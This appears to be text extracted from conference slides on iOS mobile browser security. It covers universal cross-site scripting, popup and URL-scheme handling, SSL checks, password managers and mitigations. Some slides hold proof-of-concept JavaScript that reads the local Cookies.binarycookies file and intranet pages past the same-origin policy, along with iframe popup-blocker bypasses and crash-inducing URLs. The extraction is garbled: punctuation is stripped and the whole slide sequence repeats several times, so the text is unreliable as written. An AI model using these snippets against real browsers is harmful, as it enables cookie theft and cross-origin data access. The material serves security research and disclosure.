bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
